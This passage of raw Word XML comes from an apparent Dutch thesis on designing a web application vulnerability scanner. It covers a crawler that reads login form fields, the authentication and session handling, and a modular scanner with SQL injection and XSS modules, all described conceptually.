      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AF6CBD">
        <w:t>DOM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00284F3E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD750C">
        <w:t>(Glossary, DOM)</w:t>
      </w:r>
      <w:r w:rsidR="00AF6CBD">
        <w:t xml:space="preserve"> elementen gefilterd kan worden. </w:t>
      </w:r>
      <w:r w:rsidR="00E779F1">
        <w:t>Op deze wijze kan ik de input elementen van de form</w:t>
      </w:r>
      <w:r w:rsidR="000831CC">
        <w:t xml:space="preserve"> element opsporen. </w:t>
      </w:r>
      <w:r w:rsidR="0054249C">
        <w:t>Waarom heb ik de input elementen nodig?</w:t>
      </w:r>
      <w:r w:rsidR="003F667D">
        <w:t xml:space="preserve"> De input elementen hebben een </w:t>
      </w:r>
      <w:r w:rsidR="00AC7ABF">
        <w:t>attributen</w:t>
      </w:r>
      <w:r w:rsidR="003F667D">
        <w:t xml:space="preserve"> “name” </w:t>
      </w:r>
      <w:r w:rsidR="00DF1432">
        <w:t xml:space="preserve">waarin de parameters bevinden. </w:t>
      </w:r>
      <w:r w:rsidR="00156648">
        <w:t>In het voorbeeld van figuur 4.3 zijn de twee parameters “username”</w:t>
      </w:r>
      <w:r w:rsidR="004251FC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00156648">
        <w:t>“pass”</w:t>
      </w:r>
      <w:r w:rsidR="004251FC">
        <w:t xml:space="preserve"> en “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004251FC">
        <w:t>login_submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004251FC">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00156648">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002458A2">
        <w:t xml:space="preserve">Dit betreft een login formulier van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002458A2">
        <w:t>Hackableweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002458A2">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003113C8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004251FC">
        <w:t xml:space="preserve">Voor het verzenden van </w:t>
      </w:r>
      <w:r w:rsidR="00A81763">
        <w:t>deze login</w:t>
      </w:r>
      <w:r w:rsidR="009816C4">
        <w:t xml:space="preserve"> formulier </w:t>
      </w:r>
      <w:r w:rsidR="005F4A43">
        <w:t xml:space="preserve">het de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F4A43">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F4A43">
        <w:t xml:space="preserve"> deze parameter nodig. </w:t>
      </w:r>
      <w:r w:rsidR="0025654F">
        <w:t>Dit heeft te maken met het authentiseren</w:t>
      </w:r>
      <w:r w:rsidR="003C7ADE">
        <w:t xml:space="preserve"> proces. </w:t>
      </w:r>
      <w:r w:rsidR="00FB50C7">
        <w:t xml:space="preserve">Dit zorgt ervoor dat de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB50C7">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0081354C">
        <w:t xml:space="preserve"> zich kan authentiseren indien dat nodig is. </w:t>
      </w:r>
      <w:r w:rsidR="007E31AE">
        <w:t>Mocht deze niet meegegeven zijn door de gebruiker, dan zal de toegang tot de website geblokkeerd worden.</w:t>
      </w:r>
      <w:r w:rsidR="00D57F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E0224F">
        <w:t xml:space="preserve">In figuur 4.2 zal ik in het paars aangeven wat de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E0224F">
        <w:t>DomCrawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E0224F">
        <w:t xml:space="preserve"> crawlt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099F6A0B" w14:textId="13ED10E9" w:rsidR="006B1B96" w:rsidRPr="00CE321F" w:rsidRDefault="002D08B9" w:rsidP="003F667D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251777024" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6704D9A7" wp14:editId="2966EE8B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-27305</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1849755</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5760720" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="5080" b="9525"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="20329"/>
                    <wp:lineTo x="21524" y="20329"/>
                    <wp:lineTo x="21524" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="485" name="Text Box 485"/>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6C6D5B23" w14:textId="6C71E875" w:rsidR="00CE4BB5" w:rsidRPr="000E1940" w:rsidRDefault="00CE4BB5" w:rsidP="002D08B9">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 4.12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4D9A7" id="Text Box 485" o:spid="_x0000_s1093" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-2.15pt;margin-top:145.65pt;width:453.6pt;height:21.2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K8TTsCAAB6BAAADgAAAGRycy9lMm9Eb2MueG1srFRNb9swDL0P2H8QdF+dBGvaBXGKrEWHAUVb&#10;oB16VmQ5FiCLmqTE7n79nuQ42bqdhl1kiqT48R7p5VXfGrZXPmiyJZ+eTThTVlKl7bbk355vP1xy&#10;FqKwlTBkVclfVeBXq/fvlp1bqBk1ZCrlGYLYsOhcyZsY3aIogmxUK8IZOWVhrMm3IuLqt0XlRYfo&#10;rSlmk8m86MhXzpNUIUB7Mxj5KsevayXjQ10HFZkpOWqL+fT53KSzWC3FYuuFa7Q8lCH+oYpWaIuk&#10;x1A3Igq28/qPUK2WngLV8UxSW1Bda6lyD+hmOnnTzVMjnMq9AJzgjjCF/xdW3u8fPdNVyT9ennNm&#10;RQuSnlUf2WfqWdIBoc6FBRyfHFxjDwOYHvUBytR4X/s2fdESgx1Yvx7xTeEklOcX88nFDCYJ22z+&#10;6fIihy9Or50P8YuiliWh5B78ZVjF/i5EVALX0SUlC2R0dauNSZdkuDae7QW47hodVaoRL37zMjb5&#10;WkqvBvOgUXlYDllSw0NjSYr9ps8QzfO8JNWGqleA4WkYqODkrUb6OxHio/CYIDSJrYgPOGpDXcnp&#10;IHHWkP/xN33yB7GwctZhIksevu+EV5yZrxaUp/EdBT8Km1Gwu/aa0PgU++ZkFvHARzOKtaf2Bcuy&#10;TllgElYiV8njKF7HYS+wbFKt19kJQ+pEvLNPTqbQI8zP/Yvw7kBSBL33NM6qWLzhavDNbLn1LgL4&#10;TOQJRXCULhjwzNZhGdMG/XrPXqdfxuonAAAA//8DAFBLAwQUAAYACAAAACEAOmin7+IAAAAKAQAA&#10;DwAAAGRycy9kb3ducmV2LnhtbEyPsU7DMBCGdyTewTokFtQ6jaOqCXGqqoIBlorQhc2Nr3EgPkex&#10;04a3x0yw3ek+/ff95Xa2Pbvg6DtHElbLBBhS43RHrYTj+/NiA8wHRVr1jlDCN3rYVrc3pSq0u9Ib&#10;XurQshhCvlASTAhDwblvDFrll25AirezG60KcR1brkd1jeG252mSrLlVHcUPRg24N9h81ZOVcMg+&#10;DuZhOj+97jIxvhyn/fqzraW8v5t3j8ACzuEPhl/9qA5VdDq5ibRnvYRFJiIpIc1XcYhAnqQ5sJME&#10;IcQGeFXy/xWqHwAAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAA&#10;AAAAAAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQA9grxNOwIAAHoEAAAOAAAA&#10;AAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQA6aKfv4gAAAAoBAAAP&#10;AAAAAAAAAAAAAAAAAJMEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAogUAAAAA&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="6C6D5B23" w14:textId="6C71E875" w:rsidR="00CE4BB5" w:rsidRPr="000E1940" w:rsidRDefault="00CE4BB5" w:rsidP="002D08B9">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.12</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B1B96" w:rsidRPr="00CE321F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>HTML Form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285FAD33" w14:textId="6D29AD0F" w:rsidR="002D08B9" w:rsidRDefault="00CE321F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251774976" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5457A9E0" wp14:editId="17A2D700">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-5080</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="1487805"/>
            <wp:effectExtent l="0" t="0" r="5080" b="10795"/>
            <wp:wrapTopAndBottom/>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loginform.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1487805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E10B89" w14:textId="7D3AD033" w:rsidR="007B4270" w:rsidRPr="00AA240F" w:rsidRDefault="007B4270">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA240F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Authenticatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DB93EA" w14:textId="77777777" w:rsidR="009E11FC" w:rsidRDefault="006E1597">
      <w:r>
        <w:t xml:space="preserve">Als authenticatie vereist wordt van de webapplicatie dan dient de </w:t>
      </w:r>
      <w:r w:rsidR="00C232A9">
        <w:t xml:space="preserve">deze </w:t>
      </w:r>
      <w:r w:rsidR="00ED6282">
        <w:t>door de beheerders</w:t>
      </w:r>
      <w:r w:rsidR="006802F5">
        <w:t xml:space="preserve"> (S5)</w:t>
      </w:r>
      <w:r w:rsidR="00ED6282">
        <w:t xml:space="preserve"> ervan doorgevoerd te worden. </w:t>
      </w:r>
      <w:r w:rsidR="0058795E">
        <w:t>De klant hoeft enkel een aanvraag te doen op een scan, omdat het</w:t>
      </w:r>
      <w:r w:rsidR="00F528E0">
        <w:t xml:space="preserve"> een klant betreft</w:t>
      </w:r>
      <w:r w:rsidR="004A2B85">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F528E0">
        <w:t xml:space="preserve"> heeft S5 de benodigde inloggegevens voor het authenticatie proces. Deze zijn voorzien door de klant, zowel </w:t>
      </w:r>
      <w:r w:rsidR="00F71E58">
        <w:t xml:space="preserve">de inloggegevens </w:t>
      </w:r>
      <w:r w:rsidR="00F528E0">
        <w:t>voor de consumenten account</w:t>
      </w:r>
      <w:r w:rsidR="00F9119F">
        <w:t xml:space="preserve"> en administratie account. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18353D5D" w14:textId="4D7FD507" w:rsidR="009E11FC" w:rsidRPr="009E11FC" w:rsidRDefault="009E11FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E11FC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Sessie management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B79630" w14:textId="300171FB" w:rsidR="0034078F" w:rsidRDefault="00491F47" w:rsidP="009276BC">
      <w:r>
        <w:t xml:space="preserve">Na het inloggen wordt er een sessie ID gegenereerd deze wordt opgeslagen in de sessie tabel zodat er bij elke http </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> een </w:t>
      </w:r>
      <w:r w:rsidR="00685009">
        <w:t xml:space="preserve">de sessie ID meegegeven kan worden. Zou behoudt de </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00685009">
        <w:t xml:space="preserve"> scanner </w:t>
      </w:r>
      <w:r w:rsidR="00F035A1">
        <w:t>de sessies die worden aangemaakt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427E7C28" w14:textId="77777777" w:rsidR="0034078F" w:rsidRDefault="0034078F">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B87230" w14:textId="37235A76" w:rsidR="009276BC" w:rsidRDefault="00161972" w:rsidP="00251301">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc491022085"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.4.3 </w:t>
      </w:r>
      <w:r w:rsidR="00251301">
        <w:t>Scanner</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="1A842C46" w14:textId="77777777" w:rsidR="008A7A38" w:rsidRDefault="008A7A38" w:rsidP="00251301"/>
    <w:p w14:paraId="33BFFC1E" w14:textId="62B721B7" w:rsidR="008A71DB" w:rsidRPr="008A71DB" w:rsidRDefault="008A71DB" w:rsidP="00251301">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A71DB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Introductie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C4DD05" w14:textId="26F31369" w:rsidR="008166B7" w:rsidRDefault="001074BF">
      <w:r>
        <w:t xml:space="preserve">In dit </w:t>
      </w:r>
      <w:r w:rsidR="000E476C">
        <w:t>deel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zal ik </w:t>
      </w:r>
      <w:r w:rsidR="00BB19DC">
        <w:t>het concept van de Scanner uitgebreid behandelen met als doen op een begrijpelijke manier uit te leggen hoe de Scanner in zijn werking gaat.</w:t>
      </w:r>
      <w:r w:rsidR="00914DCE">
        <w:t xml:space="preserve"> De Scanner is een fundamentele componenten van de Web Applicatie Scanner en maakt deel uit van het </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0023598C">
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0023598C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00914DCE">
        <w:t>projectstructuur</w:t>
      </w:r>
      <w:r w:rsidR="0023598C">
        <w:t xml:space="preserve"> (H6). </w:t>
      </w:r>
      <w:r w:rsidR="00BB19DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D85FBA">
        <w:t xml:space="preserve">De Scanner is het component dat de gesimuleerde aanvallen verricht op het gekozen doelwit wat een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D85FBA">
        <w:t>web applicatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D85FBA">
        <w:t xml:space="preserve"> is.</w:t>
      </w:r>
      <w:r w:rsidR="00C61A47">
        <w:t xml:space="preserve"> Het component heb ik Scanner genoemd omdat het webpagina’s scant op kwetsbaarheden.</w:t>
      </w:r>
      <w:r w:rsidR="00D85FBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A34F9C">
        <w:t xml:space="preserve">In de context van dit project zijn de doelwitten webshops van wie </w:t>
      </w:r>
      <w:r w:rsidR="00F74479">
        <w:t xml:space="preserve">de eigenaren klant zijn bij S5. </w:t>
      </w:r>
      <w:r w:rsidR="003F1A70">
        <w:t xml:space="preserve">In het </w:t>
      </w:r>
      <w:r w:rsidR="003334E9">
        <w:t>deel</w:t>
      </w:r>
      <w:r w:rsidR="003F1A70">
        <w:t xml:space="preserve"> hiervoor (H 4.4, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F1A70">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F1A70">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00667D73">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003158F8">
        <w:t xml:space="preserve">heb ik </w:t>
      </w:r>
      <w:r w:rsidR="00AD7303">
        <w:t xml:space="preserve">behandeld wat voor soort data de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD7303">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD7303">
        <w:t xml:space="preserve"> verwerkt en gestructureerd opslaat in de database. </w:t>
      </w:r>
      <w:r w:rsidR="00A547CB">
        <w:t>Deze data wordt door de Scanner gebruikt om de gesimu</w:t>
      </w:r>
      <w:r w:rsidR="00F774C7">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00761222">
        <w:t>eerde aanvallen uit te voeren.</w:t>
      </w:r>
      <w:r w:rsidR="008166B7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C74FA">
        <w:t xml:space="preserve">Voordat ik begin met het behandelen van de soort data dat de Scanner gebruikt zal ik eerst de basis uitleggen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198C2705" w14:textId="0F2B4C76" w:rsidR="00FA0263" w:rsidRDefault="00531A8C">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251976704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="765A2606" wp14:editId="48E9DF81">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>753110</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1411605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3797935" cy="1711325"/>
            <wp:effectExtent l="0" t="0" r="12065" b="0"/>
            <wp:wrapTopAndBottom/>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scan modules.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3797935" cy="1711325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F332B9">
        <w:t xml:space="preserve">De scanner </w:t>
      </w:r>
      <w:r w:rsidR="006F2BA7">
        <w:t>zal een modulaire software architectuur hebben zodat het makkelijk uitbreidbaar is met nieuwe modules.</w:t>
      </w:r>
      <w:r w:rsidR="008166B7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB1532">
        <w:t xml:space="preserve">Een </w:t>
      </w:r>
      <w:r w:rsidR="00704226">
        <w:t>scan</w:t>
      </w:r>
      <w:r w:rsidR="00AB1532">
        <w:t>module is een aanval types die de Web Applicatie Scanner uitvoert. In het onderzoek (H3) ben ik tot de conclusie gekomen dat er in de scope van dit project maar twee aanva</w:t>
      </w:r>
      <w:r w:rsidR="00290787">
        <w:t xml:space="preserve">l types </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00290787">
        <w:t>feasible</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00290787">
        <w:t xml:space="preserve">/haalbaar zijn, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00290787">
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00290787">
        <w:t xml:space="preserve"> en XSS.</w:t>
      </w:r>
      <w:r w:rsidR="009E1353">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00704226">
        <w:t xml:space="preserve">De modulaire software architectuur bestaat uit een </w:t>
      </w:r>
      <w:r w:rsidR="00B851A0">
        <w:t>basismodule, een blueprint/template, dit is de basis voor elke scan modules. Een andere uitleg is dat de basismodule abstract is</w:t>
      </w:r>
      <w:r w:rsidR="00BE6381">
        <w:t>, wat betekent dat het verschillende vormen kan aannemen</w:t>
      </w:r>
      <w:r w:rsidR="00B851A0">
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:r w:rsidR="00BE6381">
        <w:t>dat er vanuit de basismodule concrete scanmodules gemaakt kunnen worden.</w:t>
      </w:r>
      <w:r w:rsidR="003E3BF3">
        <w:t xml:space="preserve"> De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003E3BF3">
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E3BF3">
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003E3BF3">
        <w:t>XSS scanmodules</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003E3BF3">
        <w:t xml:space="preserve"> zijn dus de concrete scanmodules</w:t>
      </w:r>
      <w:r w:rsidR="00547FDF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00742F88">
        <w:t xml:space="preserve"> (Figuur 4.13)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C107EE6" w14:textId="4C590871" w:rsidR="00531A8C" w:rsidRDefault="00531A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251978752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A3BC844" wp14:editId="006B355E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>755015</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1748790</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3797935" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="227" name="Text Box 227"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3797935" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="27FAC3D7" w14:textId="0F27367D" w:rsidR="00CE4BB5" w:rsidRPr="00AD73EE" w:rsidRDefault="00CE4BB5" w:rsidP="00476E5A">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 4.13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BC844" id="Text Box 227" o:spid="_x0000_s1094" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:59.45pt;margin-top:137.7pt;width:299.05pt;height:21.2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B5+ToCAAB6BAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9owEH6ftP9g+X0EqAolIlSMimlS1VaC&#10;qc/GcYgl2+fZhoT9+p2dhG7dnqa9mPPd+bt8392xvG+1ImfhvART0MloTIkwHEppjgX9tt9+uqPE&#10;B2ZKpsCIgl6Ep/erjx+Wjc3FFGpQpXAEQYzPG1vQOgSbZ5nntdDMj8AKg8EKnGYBr+6YlY41iK5V&#10;Nh2PZ1kDrrQOuPAevQ9dkK4SflUJHp6ryotAVEHx20I6XToP8cxWS5YfHbO15P1nsH/4Cs2kwaJX&#10;qAcWGDk5+QeUltyBhyqMOOgMqkpykTggm8n4HZtdzaxIXFAcb68y+f8Hy5/OL47IsqDT6ZwSwzQ2&#10;aS/aQD5DS6IPFWqszzFxZzE1tBjATg9+j85IvK2cjr9IiWActb5c9Y1wHJ0388V8cXNLCcfYdLa4&#10;m99GmOzttXU+fBGgSTQK6rB/SVZ2fvShSx1SYjEPSpZbqVS8xMBGOXJm2OumlkH04L9lKRNzDcRX&#10;HWDnEWlY+iqRcEcsWqE9tEmi2ZX1AcoLiuGgGyhv+VZi+UfmwwtzOEHIH7ciPONRKWgKCr1FSQ3u&#10;x9/8MR8bi1FKGpzIgvrvJ+YEJeqrwZbH8R0MNxiHwTAnvQEkPsF9szyZ+MAFNZiVA/2Ky7KOVTDE&#10;DMdaBQ2DuQndXuCycbFepyQcUsvCo9lZHqEHmfftK3O2b1LA9j7BMKssf9erLjd1y65PAYVPjYzC&#10;diriAMQLDngahX4Z4wb9ek9Zb38Zq58AAAD//wMAUEsDBBQABgAIAAAAIQD9IUK54gAAAAsBAAAP&#10;AAAAZHJzL2Rvd25yZXYueG1sTI8xT8MwEIV3JP6DdUgsiDppQ9OGOFVVwQBLRejC5sbXOBDbke20&#10;4d9zTDA+3ad33ys3k+nZGX3onBWQzhJgaBunOtsKOLw/36+AhSitkr2zKOAbA2yq66tSFspd7Bue&#10;69gyKrGhkAJ0jEPBeWg0GhlmbkBLt5PzRkaKvuXKywuVm57Pk2TJjewsfdBywJ3G5qsejYB99rHX&#10;d+Pp6XWbLfzLYdwtP9taiNubafsILOIU/2D